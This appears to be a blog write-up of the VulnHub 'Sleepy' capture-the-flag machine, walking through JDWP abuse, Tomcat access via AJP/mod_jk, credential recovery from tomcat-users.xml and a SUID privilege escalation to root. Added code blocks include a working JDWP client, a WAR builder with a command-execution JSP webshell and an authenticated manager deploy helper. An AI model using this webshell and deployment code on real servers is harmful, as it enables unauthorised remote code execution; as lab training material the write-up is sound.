I woke up again at 3 AM, so it was... a good time to finish one of the CTFs I started a few weeks ago - this one is called Sleepy ;). You can find the machine online thanks to the VulnHub team. Below are a few details from the journey...
When the machine is ready, we should be somewhere here:
When I saw JDWP enabled, I decided to switch to Metasploit and use one of the exploits available there:
I decided to read a few more pages about JDWP [1, 2, 3, 4]. Now it was time to verify the hints I had found. :)
Checking prdelka's paper:
So far so good. More docs to read:
Let's check the next open port we found - 8009/tcp (AJP). Some hints you will find on the Wiki:
Ok, let's prepare our mod_jk (based on this article - thanks!):
Restarting apache2 and checking our 'settings':
Looks like now we can access /manager/.
After a while you'll see that bruteforcing the manager's password is pointless. So I was wondering if there is any other way to grab Tomcat's password list... Let's get back to our JDWP port.
According to the links mentioned before ([1, 2, 3, 4]) we'll get the list of available threads:
Now (after looking up the location of the tomcat-users.xml file) I modified the payload available here
to read the content of the file:
...and again... ;]
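The thread listing above comes from a JDWP script the post links to; as an added example (not code from the original post or from that script) here is the raw wire exchange it performs, so you can see what "JDWP enabled" actually exposes. The command-set/command numbers (VirtualMachine.IDSizes = 1/7, VirtualMachine.AllThreads = 1/4, ThreadReference.Name = 11/1) are from the JDWP specification; the thread IDs and names in the offline demo are constructed, and `list_threads()` assumes a hypothetical host/port you point it at. It stops at thread enumeration; reading a file through JDWP additionally requires setting a breakpoint and invoking Java methods, which the linked tool does for you.

```python
import socket
import struct

# Added example: minimal JDWP wire-protocol helpers (handshake, command/reply
# packets, and the three commands needed to enumerate thread names).
HANDSHAKE = b"JDWP-Handshake"
FLAG_REPLY = 0x80
HEADER_LEN = 11

VM_IDSIZES = (1, 7)       # VirtualMachine.IDSizes   (command set, command)
VM_ALLTHREADS = (1, 4)    # VirtualMachine.AllThreads
THREADREF_NAME = (11, 1)  # ThreadReference.Name


def build_command(pkt_id, cmdset, cmd, payload=b""):
    """Command packet: length(4) id(4) flags(1)=0 cmdset(1) cmd(1) data."""
    return struct.pack(">IIBBB", HEADER_LEN + len(payload), pkt_id, 0, cmdset, cmd) + payload


def build_reply(pkt_id, error, payload=b""):
    """Reply packet: length(4) id(4) flags(1)=0x80 errorcode(2) data. Used to fabricate answers offline."""
    return struct.pack(">IIBH", HEADER_LEN + len(payload), pkt_id, FLAG_REPLY, error) + payload


def parse_packet(data):
    """Decode a packet header; 'payload' is trimmed to the declared length."""
    length, pkt_id, flags = struct.unpack(">IIB", data[:9])
    pkt = {"id": pkt_id, "reply": bool(flags & FLAG_REPLY), "payload": data[HEADER_LEN:length]}
    if pkt["reply"]:
        (pkt["error"],) = struct.unpack(">H", data[9:11])
    else:
        pkt["cmdset"], pkt["cmd"] = struct.unpack(">BB", data[9:11])
    return pkt


def parse_idsizes(payload):
    """IDSizes reply: five int32 sizes; objectID size governs how thread IDs are encoded."""
    keys = ("fieldID", "methodID", "objectID", "referenceTypeID", "frameID")
    return dict(zip(keys, struct.unpack(">IIIII", payload[:20])))


def _id_fmt(size):
    return {4: ">I", 8: ">Q"}[size]


def parse_allthreads(payload, object_id_size):
    """AllThreads reply: int32 count followed by `count` threadIDs."""
    (count,) = struct.unpack(">I", payload[:4])
    fmt = _id_fmt(object_id_size)
    return [struct.unpack(fmt, payload[4 + i * object_id_size:4 + (i + 1) * object_id_size])[0]
            for i in range(count)]


def parse_jdwp_string(payload):
    """JDWP string: int32 length followed by UTF-8 bytes."""
    (n,) = struct.unpack(">I", payload[:4])
    return payload[4:4 + n].decode("utf-8")


def demo_offline():
    """Offline round-trip using constructed server replies (fake thread IDs/names)."""
    sizes = parse_idsizes(struct.pack(">IIIII", 8, 8, 8, 8, 8))
    reply = build_reply(2, 0, struct.pack(">IQQ", 2, 0x1F4, 0x1F5))
    tids = parse_allthreads(parse_packet(reply)["payload"], sizes["objectID"])
    fake_names = {0x1F4: b"main", 0x1F5: b"http-8080-1"}  # constructed
    names = {}
    for tid in tids:
        name_reply = build_reply(3, 0, struct.pack(">I", len(fake_names[tid])) + fake_names[tid])
        names[tid] = parse_jdwp_string(parse_packet(name_reply)["payload"])
    return names


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("JDWP peer closed the connection")
        buf += chunk
    return buf


def _recv_packet(sock):
    head = _recv_exact(sock, HEADER_LEN)
    (length,) = struct.unpack(">I", head[:4])
    return parse_packet(head + _recv_exact(sock, length - HEADER_LEN))


def list_threads(host, port, timeout=5):
    """Live helper (not exercised offline): returns {threadID: name} from a JDWP listener.
    Simplification: assumes replies arrive in order; a debuggee may also push
    unsolicited event packets, which a robust client must skip by packet id."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(HANDSHAKE)
        if _recv_exact(s, len(HANDSHAKE)) != HANDSHAKE:
            raise ConnectionError("no JDWP handshake from peer")
        s.sendall(build_command(1, *VM_IDSIZES))
        sizes = parse_idsizes(_recv_packet(s)["payload"])
        s.sendall(build_command(2, *VM_ALLTHREADS))
        tids = parse_allthreads(_recv_packet(s)["payload"], sizes["objectID"])
        names = {}
        for i, tid in enumerate(tids, start=3):
            s.sendall(build_command(i, *THREADREF_NAME, struct.pack(_id_fmt(sizes["objectID"]), tid)))
            names[tid] = parse_jdwp_string(_recv_packet(s)["payload"])
        return names
```

There is no authentication anywhere in that exchange: anyone who can reach the port gets the same control over the JVM as the developer's debugger, which is why an exposed JDWP port is treated as remote code execution.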
I was wondering if I needed to copy the users file via FTP. Checking:
So no luck; I needed to try something else...
Maybe some grep? ;)
"Great, a password!" But can you see this nice string at the beginning? ("<!-- " ;)) - the line grep matched sits inside an XML comment, so it is not an active user entry.
At this stage I was stuck for a while. But then I decided to read the file backwards (line by line):
Good, so now we have the 'tomcat' password and we can access Tomcat's /manager/... ;)
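The grep trap above is worth showing in code: a stock tomcat-users.xml ships with the example users commented out, so the first match is a decoy and the live entry is at the bottom. This is an added example (not from the original post); the XML sample is constructed to mirror that layout and the password in it is made up. It contrasts a plain grep, the backwards read the post ended up doing, and an actual XML parse, which drops `<!-- -->` blocks and so only ever returns real users.

```python
import xml.etree.ElementTree as ET

# Constructed sample: the commented-out defaults of a stock tomcat-users.xml,
# followed by one active entry. The password is invented for this example.
SAMPLE_TOMCAT_USERS = b"""<?xml version='1.0' encoding='utf-8'?>
<tomcat-users>
<!--
  <role rolename="tomcat"/>
  <role rolename="role1"/>
  <user username="tomcat" password="tomcat" roles="tomcat"/>
  <user username="both" password="tomcat" roles="tomcat,role1"/>
  <user username="role1" password="tomcat" roles="role1"/>
-->
  <role rolename="manager-gui"/>
  <user username="tomcat" password="Sl33py-constructed" roles="manager-gui"/>
</tomcat-users>
"""


def grep_first(data, needle="password"):
    """What `grep password tomcat-users.xml` shows first: the decoy inside the comment."""
    for line in data.decode("utf-8").splitlines():
        if needle in line:
            return line.strip()
    return None


def grep_last(data, needle="password"):
    """Reading the file backwards (tac | grep -m1 password): the last match, i.e. the live entry."""
    for line in reversed(data.decode("utf-8").splitlines()):
        if needle in line:
            return line.strip()
    return None


def _local(tag):
    """Strip a namespace prefix; Tomcat 7+ files declare xmlns="http://tomcat.apache.org/xml"."""
    return tag.rsplit("}", 1)[-1]


def active_users(data):
    """Parse as XML. ElementTree discards comments, so only real <user> entries survive.
    Returns [(username, password, [roles...]), ...]."""
    root = ET.fromstring(data)
    users = []
    for el in root.iter():
        if _local(el.tag) == "user":
            roles = [r.strip() for r in el.get("roles", "").split(",") if r.strip()]
            users.append((el.get("username"), el.get("password"), roles))
    return users


def manager_users(data):
    """Only users that can reach the manager app (manager-gui, manager-script, ...)."""
    return [u for u in active_users(data) if any(r.startswith("manager-") for r in u[2])]
```

Two caveats for real targets: on Tomcat 8+ the `password` attribute may hold a digest rather than a plaintext password (check the realm's `CredentialHandler` in server.xml), and a manager-gui user can log into the HTML interface but not the `/manager/text` API, which needs manager-script.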
My next step was to generate a WAR shell using venome.sh and deploy it to the "remote" host (reached through our mod_jk proxy on 127.0.0.1):
Preparing the WAR webshell:
And after visiting the 'new link' we should see our reverse shell in Meterpreter's window:
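The post used venome.sh and Metasploit for the WAR; as an added example (not the author's tooling) here is the same step with nothing but the standard library: build a WAR in memory containing a cmd.jsp, then prepare the authenticated PUT that the manager "text" interface accepts. The JSP body, the base URL (`http://127.0.0.1/`, i.e. the mod_jk proxy from earlier) and the credentials in the usage are assumptions for illustration.

```python
import base64
import io
import urllib.request
import zipfile

# Added example. Payload JSP: runs the `cmd` query parameter and returns its stdout.
CMD_JSP = r"""<%@ page import="java.io.*" %>
<%
String c = request.getParameter("cmd");
if (c != null) {
    Process p = Runtime.getRuntime().exec(c);
    BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String line;
    while ((line = r.readLine()) != null) { out.println(line); }
}
%>
"""

WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="2.5">
  <welcome-file-list><welcome-file>cmd.jsp</welcome-file></welcome-file-list>
</web-app>
"""


def build_war(jsp_name="cmd.jsp", jsp_body=CMD_JSP):
    """A WAR is just a zip: WEB-INF/web.xml plus the JSP at the root."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("WEB-INF/web.xml", WEB_XML)
        z.writestr(jsp_name, jsp_body)
    return buf.getvalue()


def war_entries(war_bytes):
    """Names inside a WAR, for checking what was built."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as z:
        return sorted(z.namelist())


def basic_auth_header(user, password):
    return "Basic " + base64.b64encode(f"{user}:{password}".encode("utf-8")).decode("ascii")


def deploy_request(base_url, context_path, war_bytes, user, password, text_api=True):
    """Build (without sending) the manager deploy request.
    Tomcat 7+: PUT /manager/text/deploy?path=/x  (user needs the manager-script role)
    Tomcat 6:  PUT /manager/deploy?path=/x"""
    prefix = "/manager/text/deploy" if text_api else "/manager/deploy"
    url = f"{base_url.rstrip('/')}{prefix}?path={context_path}"
    req = urllib.request.Request(url, data=war_bytes, method="PUT")
    req.add_header("Authorization", basic_auth_header(user, password))
    req.add_header("Content-Type", "application/octet-stream")
    return req


def deploy(base_url, context_path, user, password, text_api=True):
    """Live helper (needs a reachable manager): send the PUT and return the manager's reply text."""
    req = deploy_request(base_url, context_path, build_war(), user, password, text_api)
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read().decode("utf-8", errors="replace")


if __name__ == "__main__":
    # Assumed values for illustration: proxy on 127.0.0.1, credentials from tomcat-users.xml.
    print(deploy("http://127.0.0.1/", "/sleepy", "tomcat", "s3cret"))
    # then: http://127.0.0.1/sleepy/cmd.jsp?cmd=id
```

If the manager answers `OK - Deployed application at context path /sleepy`, the JSP is live at that path; a 403 usually means the account has manager-gui but not manager-script, in which case the HTML upload form at /manager/html is the route (and what the Metasploit module in the post uses).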
Cool. Let's find some SUID files:
As you can see there is a nightmare binary:
Checking with strings:
Ok, again. I prepared a new session/WAR file:
Next step: exporting a function in bash:
Unfortunately I wasn't able to grab a root shell...
...until kill with the proper signal was used (in the 2nd (session) console):
Great, root shell :)
It was a great CTF. Big thanks goes to the author!
Big thanks also go to VulnHub for sharing all of these games.